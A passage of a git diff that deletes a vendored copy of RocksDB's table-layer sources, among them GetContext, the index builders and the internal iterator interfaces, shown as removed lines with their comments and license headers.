-bool GetContext::SaveValue(const ParsedInternalKey& parsed_key,
-                           const Slice& value, Cleanable* value_pinner) {
-  assert((state_ != kMerge && parsed_key.type != kTypeMerge) ||
-         merge_context_ != nullptr);
-  if (ucmp_->Equal(parsed_key.user_key, user_key_)) {
-    appendToReplayLog(replay_log_, parsed_key.type, value);
-
-    if (seq_ != nullptr) {
-      // Set the sequence number if it is uninitialized
-      if (*seq_ == kMaxSequenceNumber) {
-        *seq_ = parsed_key.sequence;
-      }
-    }
-
-    auto type = parsed_key.type;
-    // Key matches. Process it
-    if ((type == kTypeValue || type == kTypeMerge || type == kTypeBlobIndex) &&
-        range_del_agg_ != nullptr && range_del_agg_->ShouldDelete(parsed_key)) {
-      type = kTypeRangeDeletion;
-    }
-    switch (type) {
-      case kTypeValue:
-      case kTypeBlobIndex:
-        assert(state_ == kNotFound || state_ == kMerge);
-        if (type == kTypeBlobIndex && is_blob_index_ == nullptr) {
-          // Blob value not supported. Stop.
-          state_ = kBlobIndex;
-          return false;
-        }
-        if (kNotFound == state_) {
-          state_ = kFound;
-          if (LIKELY(pinnable_val_ != nullptr)) {
-            if (LIKELY(value_pinner != nullptr)) {
-              // If the backing resources for the value are provided, pin them
-              pinnable_val_->PinSlice(value, value_pinner);
-            } else {
-              // Otherwise copy the value
-              pinnable_val_->PinSelf(value);
-            }
-          }
-        } else if (kMerge == state_) {
-          assert(merge_operator_ != nullptr);
-          state_ = kFound;
-          if (LIKELY(pinnable_val_ != nullptr)) {
-            Status merge_status = MergeHelper::TimedFullMerge(
-                merge_operator_, user_key_, &value,
-                merge_context_->GetOperands(), pinnable_val_->GetSelf(),
-                logger_, statistics_, env_);
-            pinnable_val_->PinSelf();
-            if (!merge_status.ok()) {
-              state_ = kCorrupt;
-            }
-          }
-        }
-        if (is_blob_index_ != nullptr) {
-          *is_blob_index_ = (type == kTypeBlobIndex);
-        }
-        return false;
-
-      case kTypeDeletion:
-      case kTypeSingleDeletion:
-      case kTypeRangeDeletion:
-        // TODO(noetzli): Verify correctness once merge of single-deletes
-        // is supported
-        assert(state_ == kNotFound || state_ == kMerge);
-        if (kNotFound == state_) {
-          state_ = kDeleted;
-        } else if (kMerge == state_) {
-          state_ = kFound;
-          if (LIKELY(pinnable_val_ != nullptr)) {
-            Status merge_status = MergeHelper::TimedFullMerge(
-                merge_operator_, user_key_, nullptr,
-                merge_context_->GetOperands(), pinnable_val_->GetSelf(),
-                logger_, statistics_, env_);
-            pinnable_val_->PinSelf();
-            if (!merge_status.ok()) {
-              state_ = kCorrupt;
-            }
-          }
-        }
-        return false;
-
-      case kTypeMerge:
-        assert(state_ == kNotFound || state_ == kMerge);
-        state_ = kMerge;
-        // value_pinner is not set from plain_table_reader.cc for example.
-        if (pinned_iters_mgr() && pinned_iters_mgr()->PinningEnabled() &&
-            value_pinner != nullptr) {
-          value_pinner->DelegateCleanupsTo(pinned_iters_mgr());
-          merge_context_->PushOperand(value, true /*value_pinned*/);
-        } else {
-          merge_context_->PushOperand(value, false);
-        }
-        return true;
-
-      default:
-        assert(false);
-        break;
-    }
-  }
-
-  // state_ could be Corrupt, merge or notfound
-  return false;
-}
-
-void replayGetContextLog(const Slice& replay_log, const Slice& user_key,
-                         GetContext* get_context, Cleanable* value_pinner) {
-#ifndef ROCKSDB_LITE
-  Slice s = replay_log;
-  while (s.size()) {
-    auto type = static_cast<ValueType>(*s.data());
-    s.remove_prefix(1);
-    Slice value;
-    bool ret = GetLengthPrefixedSlice(&s, &value);
-    assert(ret);
-    (void)ret;
-
-    // Since SequenceNumber is not stored and unknown, we will use
-    // kMaxSequenceNumber.
-    get_context->SaveValue(
-        ParsedInternalKey(user_key, kMaxSequenceNumber, type), value,
-        value_pinner);
-  }
-#else   // ROCKSDB_LITE
-  assert(false);
-#endif  // ROCKSDB_LITE
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/get_context.h b/thirdparty/rocksdb/table/get_context.h
deleted file mode 100644
index a708f6b..0000000
--- a/thirdparty/rocksdb/table/get_context.h
+++ /dev/null
@@ -1,95 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include "db/merge_context.h"
-#include "db/range_del_aggregator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/types.h"
-#include "table/block.h"
-
-namespace rocksdb {
-class MergeContext;
-class PinnedIteratorsManager;
-
-class GetContext {
- public:
-  enum GetState {
-    kNotFound,
-    kFound,
-    kDeleted,
-    kCorrupt,
-    kMerge,  // saver contains the current merge result (the operands)
-    kBlobIndex,
-  };
-
-  GetContext(const Comparator* ucmp, const MergeOperator* merge_operator,
-             Logger* logger, Statistics* statistics, GetState init_state,
-             const Slice& user_key, PinnableSlice* value, bool* value_found,
-             MergeContext* merge_context, RangeDelAggregator* range_del_agg,
-             Env* env, SequenceNumber* seq = nullptr,
-             PinnedIteratorsManager* _pinned_iters_mgr = nullptr,
-             bool* is_blob_index = nullptr);
-
-  void MarkKeyMayExist();
-
-  // Records this key, value, and any meta-data (such as sequence number and
-  // state) into this GetContext.
-  //
-  // Returns True if more keys need to be read (due to merges) or
-  //         False if the complete value has been found.
-  bool SaveValue(const ParsedInternalKey& parsed_key, const Slice& value,
-                 Cleanable* value_pinner = nullptr);
-
-  // Simplified version of the previous function. Should only be used when we
-  // know that the operation is a Put.
-  void SaveValue(const Slice& value, SequenceNumber seq);
-
-  GetState State() const { return state_; }
-
-  RangeDelAggregator* range_del_agg() { return range_del_agg_; }
-
-  PinnedIteratorsManager* pinned_iters_mgr() { return pinned_iters_mgr_; }
-
-  // If a non-null string is passed, all the SaveValue calls will be
-  // logged into the string. The operations can then be replayed on
-  // another GetContext with replayGetContextLog.
-  void SetReplayLog(std::string* replay_log) { replay_log_ = replay_log; }
-
-  // Do we need to fetch the SequenceNumber for this key?
-  bool NeedToReadSequence() const { return (seq_ != nullptr); }
-
-  bool sample() const { return sample_; }
-
- private:
-  const Comparator* ucmp_;
-  const MergeOperator* merge_operator_;
-  // the merge operations encountered;
-  Logger* logger_;
-  Statistics* statistics_;
-
-  GetState state_;
-  Slice user_key_;
-  PinnableSlice* pinnable_val_;
-  bool* value_found_;  // Is value set correctly? Used by KeyMayExist
-  MergeContext* merge_context_;
-  RangeDelAggregator* range_del_agg_;
-  Env* env_;
-  // If a key is found, seq_ will be set to the SequenceNumber of most recent
-  // write to the key or kMaxSequenceNumber if unknown
-  SequenceNumber* seq_;
-  std::string* replay_log_;
-  // Used to temporarily pin blocks when state_ == GetContext::kMerge
-  PinnedIteratorsManager* pinned_iters_mgr_;
-  bool sample_;
-  bool* is_blob_index_;
-};
-
-void replayGetContextLog(const Slice& replay_log, const Slice& user_key,
-                         GetContext* get_context,
-                         Cleanable* value_pinner = nullptr);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/index_builder.cc b/thirdparty/rocksdb/table/index_builder.cc
deleted file mode 100644
index cdf20ae..0000000
--- a/thirdparty/rocksdb/table/index_builder.cc
+++ /dev/null
@@ -1,187 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/index_builder.h"
-#include <assert.h>
-#include <inttypes.h>
-
-#include <list>
-#include <string>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/flush_block_policy.h"
-#include "table/format.h"
-#include "table/partitioned_filter_block.h"
-
-// Without anonymous namespace here, we fail the warning -Wmissing-prototypes
-namespace rocksdb {
-// using namespace rocksdb;
-// Create a index builder based on its type.
-IndexBuilder* IndexBuilder::CreateIndexBuilder(
-    BlockBasedTableOptions::IndexType index_type,
-    const InternalKeyComparator* comparator,
-    const InternalKeySliceTransform* int_key_slice_transform,
-    const BlockBasedTableOptions& table_opt) {
-  switch (index_type) {
-    case BlockBasedTableOptions::kBinarySearch: {
-      return new ShortenedIndexBuilder(comparator,
-                                       table_opt.index_block_restart_interval);
-    }
-    case BlockBasedTableOptions::kHashSearch: {
-      return new HashIndexBuilder(comparator, int_key_slice_transform,
-                                  table_opt.index_block_restart_interval);
-    }
-    case BlockBasedTableOptions::kTwoLevelIndexSearch: {
-      return PartitionedIndexBuilder::CreateIndexBuilder(comparator, table_opt);
-    }
-    default: {
-      assert(!"Do not recognize the index type ");
-      return nullptr;
-    }
-  }
-  // impossible.
-  assert(false);
-  return nullptr;
-}
-
-PartitionedIndexBuilder* PartitionedIndexBuilder::CreateIndexBuilder(
-    const InternalKeyComparator* comparator,
-    const BlockBasedTableOptions& table_opt) {
-  return new PartitionedIndexBuilder(comparator, table_opt);
-}
-
-PartitionedIndexBuilder::PartitionedIndexBuilder(
-    const InternalKeyComparator* comparator,
-    const BlockBasedTableOptions& table_opt)
-    : IndexBuilder(comparator),
-      index_block_builder_(table_opt.index_block_restart_interval),
-      sub_index_builder_(nullptr),
-      table_opt_(table_opt) {}
-
-PartitionedIndexBuilder::~PartitionedIndexBuilder() {
-  delete sub_index_builder_;
-}
-
-void PartitionedIndexBuilder::MakeNewSubIndexBuilder() {
-  assert(sub_index_builder_ == nullptr);
-  sub_index_builder_ = new ShortenedIndexBuilder(
-      comparator_, table_opt_.index_block_restart_interval);
-  flush_policy_.reset(FlushBlockBySizePolicyFactory::NewFlushBlockPolicy(
-      table_opt_.metadata_block_size, table_opt_.block_size_deviation,
-      sub_index_builder_->index_block_builder_));
-  partition_cut_requested_ = false;
-}
-
-void PartitionedIndexBuilder::RequestPartitionCut() {
-  partition_cut_requested_ = true;
-}
-
-void PartitionedIndexBuilder::AddIndexEntry(
-    std::string* last_key_in_current_block,
-    const Slice* first_key_in_next_block, const BlockHandle& block_handle) {
-  // Note: to avoid two consecuitive flush in the same method call, we do not
-  // check flush policy when adding the last key
-  if (UNLIKELY(first_key_in_next_block == nullptr)) {  // no more keys
-    if (sub_index_builder_ == nullptr) {
-      MakeNewSubIndexBuilder();
-    }
-    sub_index_builder_->AddIndexEntry(last_key_in_current_block,
-                                      first_key_in_next_block, block_handle);
-    sub_index_last_key_ = std::string(*last_key_in_current_block);
-    entries_.push_back(
-        {sub_index_last_key_,
-         std::unique_ptr<ShortenedIndexBuilder>(sub_index_builder_)});
-    sub_index_builder_ = nullptr;
-    cut_filter_block = true;
-  } else {
-    // apply flush policy only to non-empty sub_index_builder_
-    if (sub_index_builder_ != nullptr) {
-      std::string handle_encoding;
-      block_handle.EncodeTo(&handle_encoding);
-      bool do_flush =
-          partition_cut_requested_ ||
-          flush_policy_->Update(*last_key_in_current_block, handle_encoding);
-      if (do_flush) {
-        entries_.push_back(
-            {sub_index_last_key_,
-             std::unique_ptr<ShortenedIndexBuilder>(sub_index_builder_)});
-        cut_filter_block = true;
-        sub_index_builder_ = nullptr;
-      }
-    }
-    if (sub_index_builder_ == nullptr) {
-      MakeNewSubIndexBuilder();
-    }
-    sub_index_builder_->AddIndexEntry(last_key_in_current_block,
-                                      first_key_in_next_block, block_handle);
-    sub_index_last_key_ = std::string(*last_key_in_current_block);
-  }
-}
-
-Status PartitionedIndexBuilder::Finish(
-    IndexBlocks* index_blocks, const BlockHandle& last_partition_block_handle) {
-  assert(!entries_.empty());
-  // It must be set to null after last key is added
-  assert(sub_index_builder_ == nullptr);
-  if (finishing_indexes == true) {
-    Entry& last_entry = entries_.front();
-    std::string handle_encoding;
-    last_partition_block_handle.EncodeTo(&handle_encoding);
-    index_block_builder_.Add(last_entry.key, handle_encoding);
-    entries_.pop_front();
-  }
-  // If there is no sub_index left, then return the 2nd level index.
-  if (UNLIKELY(entries_.empty())) {
-    index_blocks->index_block_contents = index_block_builder_.Finish();
-    return Status::OK();
-  } else {
-    // Finish the next partition index in line and Incomplete() to indicate we
-    // expect more calls to Finish
-    Entry& entry = entries_.front();
-    auto s = entry.value->Finish(index_blocks);
-    finishing_indexes = true;
-    return s.ok() ? Status::Incomplete() : s;
-  }
-}
-
-// Estimate size excluding the top-level index
-// It is assumed that this method is called before writing index partition
-// starts
-size_t PartitionedIndexBuilder::EstimatedSize() const {
-  size_t total = 0;
-  for (auto it = entries_.begin(); it != entries_.end(); ++it) {
-    total += it->value->EstimatedSize();
-  }
-  total +=
-      sub_index_builder_ == nullptr ? 0 : sub_index_builder_->EstimatedSize();
-  return total;
-}
-
-// Since when this method is called we do not know the index block offsets yet,
-// the top-level index does not exist. Hence we estimate the block offsets and
-// create a temporary top-level index.
-size_t PartitionedIndexBuilder::EstimateTopLevelIndexSize(
-    uint64_t offset) const {
-  BlockBuilder tmp_builder(
-      table_opt_.index_block_restart_interval);  // tmp top-level index builder
-  for (auto it = entries_.begin(); it != entries_.end(); ++it) {
-    std::string tmp_handle_encoding;
-    uint64_t size = it->value->EstimatedSize();
-    BlockHandle tmp_block_handle(offset, size);
-    tmp_block_handle.EncodeTo(&tmp_handle_encoding);
-    tmp_builder.Add(it->key, tmp_handle_encoding);
-    offset += size;
-  }
-  return tmp_builder.CurrentSizeEstimate();
-}
-
-size_t PartitionedIndexBuilder::NumPartitions() const {
-  return entries_.size();
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/index_builder.h b/thirdparty/rocksdb/table/index_builder.h
deleted file mode 100644
index d591e0e..0000000
--- a/thirdparty/rocksdb/table/index_builder.h
+++ /dev/null
@@ -1,342 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <assert.h>
-#include <inttypes.h>
-
-#include <list>
-#include <string>
-#include <unordered_map>
-
-#include "rocksdb/comparator.h"
-#include "table/block_based_table_factory.h"
-#include "table/block_builder.h"
-#include "table/format.h"
-
-namespace rocksdb {
-// The interface for building index.
-// Instruction for adding a new concrete IndexBuilder:
-//  1. Create a subclass instantiated from IndexBuilder.
-//  2. Add a new entry associated with that subclass in TableOptions::IndexType.
-//  3. Add a create function for the new subclass in CreateIndexBuilder.
-// Note: we can devise more advanced design to simplify the process for adding
-// new subclass, which will, on the other hand, increase the code complexity and
-// catch unwanted attention from readers. Given that we won't add/change
-// indexes frequently, it makes sense to just embrace a more straightforward
-// design that just works.
-class IndexBuilder {
- public:
-  static IndexBuilder* CreateIndexBuilder(
-      BlockBasedTableOptions::IndexType index_type,
-      const rocksdb::InternalKeyComparator* comparator,
-      const InternalKeySliceTransform* int_key_slice_transform,
-      const BlockBasedTableOptions& table_opt);
-
-  // Index builder will construct a set of blocks which contain:
-  //  1. One primary index block.
-  //  2. (Optional) a set of metablocks that contains the metadata of the
-  //     primary index.
-  struct IndexBlocks {
-    Slice index_block_contents;
-    std::unordered_map<std::string, Slice> meta_blocks;
-  };
-  explicit IndexBuilder(const InternalKeyComparator* comparator)
-      : comparator_(comparator) {}
-
-  virtual ~IndexBuilder() {}
-
-  // Add a new index entry to index block.
-  // To allow further optimization, we provide `last_key_in_current_block` and
-  // `first_key_in_next_block`, based on which the specific implementation can
-  // determine the best index key to be used for the index block.
-  // @last_key_in_current_block: this parameter maybe overridden with the value
-  //                             "substitute key".
-  // @first_key_in_next_block: it will be nullptr if the entry being added is
-  //                           the last one in the table
-  //
-  // REQUIRES: Finish() has not yet been called.
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) = 0;
-
-  // This method will be called whenever a key is added. The subclasses may
-  // override OnKeyAdded() if they need to collect additional information.
-  virtual void OnKeyAdded(const Slice& key) {}
-
-  // Inform the index builder that all entries has been written. Block builder
-  // may therefore perform any operation required for block finalization.
-  //
-  // REQUIRES: Finish() has not yet been called.
-  inline Status Finish(IndexBlocks* index_blocks) {
-    // Throw away the changes to last_partition_block_handle. It has no effect
-    // on the first call to Finish anyway.
-    BlockHandle last_partition_block_handle;
-    return Finish(index_blocks, last_partition_block_handle);
-  }
-
-  // This override of Finish can be utilized to build the 2nd level index in
-  // PartitionIndexBuilder.
-  //
-  // index_blocks will be filled with the resulting index data. If the return
-  // value is Status::InComplete() then it means that the index is partitioned
-  // and the callee should keep calling Finish until Status::OK() is returned.
-  // In that case, last_partition_block_handle is pointer to the block written
-  // with the result of the last call to Finish. This can be utilized to build
-  // the second level index pointing to each block of partitioned indexes. The
-  // last call to Finish() that returns Status::OK() populates index_blocks with
-  // the 2nd level index content.
-  virtual Status Finish(IndexBlocks* index_blocks,
-                        const BlockHandle& last_partition_block_handle) = 0;
-
-  // Get the estimated size for index block.
-  virtual size_t EstimatedSize() const = 0;
-
- protected:
-  const InternalKeyComparator* comparator_;
-};
-
-// This index builder builds space-efficient index block.
-//
-// Optimizations:
-//  1. Made block's `block_restart_interval` to be 1, which will avoid linear
-//     search when doing index lookup (can be disabled by setting
-//     index_block_restart_interval).
-//  2. Shorten the key length for index block. Other than honestly using the
-//     last key in the data block as the index key, we instead find a shortest
-//     substitute key that serves the same function.
-class ShortenedIndexBuilder : public IndexBuilder {
- public:
-  explicit ShortenedIndexBuilder(const InternalKeyComparator* comparator,
-                                 int index_block_restart_interval)
-      : IndexBuilder(comparator),
-        index_block_builder_(index_block_restart_interval) {}
-
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) override {
-    if (first_key_in_next_block != nullptr) {
-      comparator_->FindShortestSeparator(last_key_in_current_block,
-                                         *first_key_in_next_block);
-    } else {
-      comparator_->FindShortSuccessor(last_key_in_current_block);
-    }
-
-    std::string handle_encoding;
-    block_handle.EncodeTo(&handle_encoding);
-    index_block_builder_.Add(*last_key_in_current_block, handle_encoding);
-  }
-
-  using IndexBuilder::Finish;
-  virtual Status Finish(
-      IndexBlocks* index_blocks,
-      const BlockHandle& last_partition_block_handle) override {
-    index_blocks->index_block_contents = index_block_builder_.Finish();
-    return Status::OK();
-  }
-
-  virtual size_t EstimatedSize() const override {
-    return index_block_builder_.CurrentSizeEstimate();
-  }
-
-  friend class PartitionedIndexBuilder;
-
- private:
-  BlockBuilder index_block_builder_;
-};
-
-// HashIndexBuilder contains a binary-searchable primary index and the
-// metadata for secondary hash index construction.
-// The metadata for hash index consists two parts:
-//  - a metablock that compactly contains a sequence of prefixes. All prefixes
-//    are stored consectively without any metadata (like, prefix sizes) being
-//    stored, which is kept in the other metablock.
-//  - a metablock contains the metadata of the prefixes, including prefix size,
-//    restart index and number of block it spans. The format looks like:
-//
-// +-----------------+---------------------------+---------------------+
-// <=prefix 1
-// | length: 4 bytes | restart interval: 4 bytes | num-blocks: 4 bytes |
-// +-----------------+---------------------------+---------------------+
-// <=prefix 2
-// | length: 4 bytes | restart interval: 4 bytes | num-blocks: 4 bytes |
-// +-----------------+---------------------------+---------------------+
-// |                                                                   |
-// | ....                                                              |
-// |                                                                   |
-// +-----------------+---------------------------+---------------------+
-// <=prefix n
-// | length: 4 bytes | restart interval: 4 bytes | num-blocks: 4 bytes |
-// +-----------------+---------------------------+---------------------+
-//
-// The reason of separating these two metablocks is to enable the efficiently
-// reuse the first metablock during hash index construction without unnecessary
-// data copy or small heap allocations for prefixes.
-class HashIndexBuilder : public IndexBuilder {
- public:
-  explicit HashIndexBuilder(const InternalKeyComparator* comparator,
-                            const SliceTransform* hash_key_extractor,
-                            int index_block_restart_interval)
-      : IndexBuilder(comparator),
-        primary_index_builder_(comparator, index_block_restart_interval),
-        hash_key_extractor_(hash_key_extractor) {}
-
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) override {
-    ++current_restart_index_;
-    primary_index_builder_.AddIndexEntry(last_key_in_current_block,
-                                         first_key_in_next_block, block_handle);
-  }
-
-  virtual void OnKeyAdded(const Slice& key) override {
-    auto key_prefix = hash_key_extractor_->Transform(key);
-    bool is_first_entry = pending_block_num_ == 0;
-
-    // Keys may share the prefix
-    if (is_first_entry || pending_entry_prefix_ != key_prefix) {
-      if (!is_first_entry) {
-        FlushPendingPrefix();
-      }
-
-      // need a hard copy otherwise the underlying data changes all the time.
-      // TODO(kailiu) ToString() is expensive. We may speed up can avoid data
-      // copy.
-      pending_entry_prefix_ = key_prefix.ToString();
-      pending_block_num_ = 1;
-      pending_entry_index_ = static_cast<uint32_t>(current_restart_index_);
-    } else {
-      // entry number increments when keys share the prefix reside in
-      // different data blocks.
-      auto last_restart_index = pending_entry_index_ + pending_block_num_ - 1;
-      assert(last_restart_index <= current_restart_index_);
-      if (last_restart_index != current_restart_index_) {
-        ++pending_block_num_;
-      }
-    }
-  }
-
-  virtual Status Finish(
-      IndexBlocks* index_blocks,
-      const BlockHandle& last_partition_block_handle) override {
-    FlushPendingPrefix();
-    primary_index_builder_.Finish(index_blocks, last_partition_block_handle);
-    index_blocks->meta_blocks.insert(
-        {kHashIndexPrefixesBlock.c_str(), prefix_block_});
-    index_blocks->meta_blocks.insert(
-        {kHashIndexPrefixesMetadataBlock.c_str(), prefix_meta_block_});
-    return Status::OK();
-  }
-
-  virtual size_t EstimatedSize() const override {
-    return primary_index_builder_.EstimatedSize() + prefix_block_.size() +
-           prefix_meta_block_.size();
-  }
-
- private:
-  void FlushPendingPrefix() {
-    prefix_block_.append(pending_entry_prefix_.data(),
-                         pending_entry_prefix_.size());
-    PutVarint32Varint32Varint32(
-        &prefix_meta_block_,
-        static_cast<uint32_t>(pending_entry_prefix_.size()),
-        pending_entry_index_, pending_block_num_);
-  }
-
-  ShortenedIndexBuilder primary_index_builder_;
-  const SliceTransform* hash_key_extractor_;
-
-  // stores a sequence of prefixes
-  std::string prefix_block_;
-  // stores the metadata of prefixes
-  std::string prefix_meta_block_;
-
-  // The following 3 variables keeps unflushed prefix and its metadata.
-  // The details of block_num and entry_index can be found in
-  // "block_hash_index.{h,cc}"
-  uint32_t pending_block_num_ = 0;
-  uint32_t pending_entry_index_ = 0;
-  std::string pending_entry_prefix_;
-
-  uint64_t current_restart_index_ = 0;
-};
-
-/**
- * IndexBuilder for two-level indexing. Internally it creates a new index for
- * each partition and Finish then in order when Finish is called on it
- * continiously until Status::OK() is returned.
- *
- * The format on the disk would be I I I I I I IP where I is block containing a
- * partition of indexes built using ShortenedIndexBuilder and IP is a block
- * containing a secondary index on the partitions, built using
- * ShortenedIndexBuilder.
- */
-class PartitionedIndexBuilder : public IndexBuilder {
- public:
-  static PartitionedIndexBuilder* CreateIndexBuilder(
-      const rocksdb::InternalKeyComparator* comparator,
-      const BlockBasedTableOptions& table_opt);
-
-  explicit PartitionedIndexBuilder(const InternalKeyComparator* comparator,
-                                   const BlockBasedTableOptions& table_opt);
-
-  virtual ~PartitionedIndexBuilder();
-
-  virtual void AddIndexEntry(std::string* last_key_in_current_block,
-                             const Slice* first_key_in_next_block,
-                             const BlockHandle& block_handle) override;
-
-  virtual Status Finish(
-      IndexBlocks* index_blocks,
-      const BlockHandle& last_partition_block_handle) override;
-
-  virtual size_t EstimatedSize() const override;
-  size_t EstimateTopLevelIndexSize(uint64_t) const;
-  size_t NumPartitions() const;
-
-  inline bool ShouldCutFilterBlock() {
-    // Current policy is to align the partitions of index and filters
-    if (cut_filter_block) {
-      cut_filter_block = false;
-      return true;
-    }
-    return false;
-  }
-
-  std::string& GetPartitionKey() { return sub_index_last_key_; }
-
-  // Called when an external entity (such as filter partition builder) request
-  // cutting the next partition
-  void RequestPartitionCut();
-
- private:
-  void MakeNewSubIndexBuilder();
-
-  struct Entry {
-    std::string key;
-    std::unique_ptr<ShortenedIndexBuilder> value;
-  };
-  std::list<Entry> entries_;  // list of partitioned indexes and their keys
-  BlockBuilder index_block_builder_;  // top-level index builder
-  // the active partition index builder
-  ShortenedIndexBuilder* sub_index_builder_;
-  // the last key in the active partition index builder
-  std::string sub_index_last_key_;
-  std::unique_ptr<FlushBlockPolicy> flush_policy_;
-  // true if Finish is called once but not complete yet.
-  bool finishing_indexes = false;
-  const BlockBasedTableOptions& table_opt_;
-  // true if an external entity (such as filter partition builder) request
-  // cutting the next partition
-  bool partition_cut_requested_ = true;
-  // true if it should cut the next filter partition block
-  bool cut_filter_block = false;
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/internal_iterator.h b/thirdparty/rocksdb/table/internal_iterator.h
deleted file mode 100644
index 2bfdb7d..0000000
--- a/thirdparty/rocksdb/table/internal_iterator.h
+++ /dev/null
@@ -1,121 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include <string>
-#include "rocksdb/comparator.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class PinnedIteratorsManager;
-
-class InternalIterator : public Cleanable {
- public:
-  InternalIterator() {}
-  virtual ~InternalIterator() {}
-
-  // An iterator is either positioned at a key/value pair, or
-  // not valid.  This method returns true iff the iterator is valid.
-  virtual bool Valid() const = 0;
-
-  // Position at the first key in the source.  The iterator is Valid()
-  // after this call iff the source is not empty.
-  virtual void SeekToFirst() = 0;
-
-  // Position at the last key in the source.  The iterator is
-  // Valid() after this call iff the source is not empty.
-  virtual void SeekToLast() = 0;
-
-  // Position at the first key in the source that at or past target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or past target.
-  virtual void Seek(const Slice& target) = 0;
-
-  // Position at the first key in the source that at or before target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or before target.
-  virtual void SeekForPrev(const Slice& target) = 0;
-
-  // Moves to the next entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the last entry in the source.
-  // REQUIRES: Valid()
-  virtual void Next() = 0;
-
-  // Moves to the previous entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the first entry in source.
-  // REQUIRES: Valid()
-  virtual void Prev() = 0;
-
-  // Return the key for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: Valid()
-  virtual Slice key() const = 0;
-
-  // Return the value for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: !AtEnd() && !AtStart()
-  virtual Slice value() const = 0;
-
-  // If an error has occurred, return it.  Else return an ok status.
-  // If non-blocking IO is requested and this operation cannot be
-  // satisfied without doing some IO, then this returns Status::Incomplete().
-  virtual Status status() const = 0;
-
-  // Pass the PinnedIteratorsManager to the Iterator, most Iterators dont
-  // communicate with PinnedIteratorsManager so default implementation is no-op
-  // but for Iterators that need to communicate with PinnedIteratorsManager
-  // they will implement this function and use the passed pointer to communicate
-  // with PinnedIteratorsManager.
-  virtual void SetPinnedItersMgr(PinnedIteratorsManager* pinned_iters_mgr) {}
-
-  // If true, this means that the Slice returned by key() is valid as long as
-  // PinnedIteratorsManager::ReleasePinnedData is not called and the
-  // Iterator is not deleted.
-  //
-  // IsKeyPinned() is guaranteed to always return true if
-  //  - Iterator is created with ReadOptions::pin_data = true
-  //  - DB tables were created with BlockBasedTableOptions::use_delta_encoding
-  //    set to false.
-  virtual bool IsKeyPinned() const { return false; }
-
-  // If true, this means that the Slice returned by value() is valid as long as
-  // PinnedIteratorsManager::ReleasePinnedData is not called and the
-  // Iterator is not deleted.
-  virtual bool IsValuePinned() const { return false; }
-
-  virtual Status GetProperty(std::string prop_name, std::string* prop) {
-    return Status::NotSupported("");
-  }
-
- protected:
-  void SeekForPrevImpl(const Slice& target, const Comparator* cmp) {
-    Seek(target);
-    if (!Valid()) {
-      SeekToLast();
-    }
-    while (Valid() && cmp->Compare(target, key()) < 0) {
-      Prev();
-    }
-  }
-
- private:
-  // No copying allowed
-  InternalIterator(const InternalIterator&) = delete;
-  InternalIterator& operator=(const InternalIterator&) = delete;
-};
-
-// Return an empty iterator (yields nothing).
-extern InternalIterator* NewEmptyInternalIterator();
-
-// Return an empty iterator with the specified status.
-extern InternalIterator* NewErrorInternalIterator(const Status& status);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/iter_heap.h b/thirdparty/rocksdb/table/iter_heap.h
deleted file mode 100644
index 74c06ca..0000000
--- a/thirdparty/rocksdb/table/iter_heap.h
+++ /dev/null
@@ -1,42 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#pragma once
-
-#include "rocksdb/comparator.h"
-#include "table/iterator_wrapper.h"
-
-namespace rocksdb {
-
-// When used with std::priority_queue, this comparison functor puts the
-// iterator with the max/largest key on top.
-class MaxIteratorComparator {
- public:
-  MaxIteratorComparator(const Comparator* comparator) :
-    comparator_(comparator) {}
-
-  bool operator()(IteratorWrapper* a, IteratorWrapper* b) const {
-    return comparator_->Compare(a->key(), b->key()) < 0;
-  }
- private:
-  const Comparator* comparator_;
-};
-
-// When used with std::priority_queue, this comparison functor puts the
-// iterator with the min/smallest key on top.
-class MinIteratorComparator {
- public:
